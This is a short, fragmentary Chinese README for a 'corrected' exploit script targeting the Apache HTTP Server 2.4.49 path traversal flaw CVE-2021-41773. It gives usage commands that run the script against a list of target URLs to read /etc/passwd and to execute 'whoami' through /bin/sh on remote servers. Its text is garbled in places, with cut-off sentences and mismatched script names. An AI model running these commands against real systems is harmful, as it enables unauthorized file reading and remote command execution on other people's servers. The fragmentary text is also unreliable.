这是一个针对Apache HTTP Server 2.4.49漏洞(标识为CVE-2021-41773)的漏洞利用程序。原始版本的漏洞利用程序发布在Exploit-DB上,包含语法和运行错误,因此本版本已进行修正以确保其在Linux环境中的正常运行。
if语句中的语法错误。for循环以确保其正确执行。chmod +x PoC.sh
./50383.sh targets.txt /etc/passwd
targets.txt文件(目标列表):http://192.168.1.100
http://vulnerable-site.com
/etc/passwd:./50383.sh targets.txt /etc/passwd
./50383.sh targets.txt /bin/sh whoami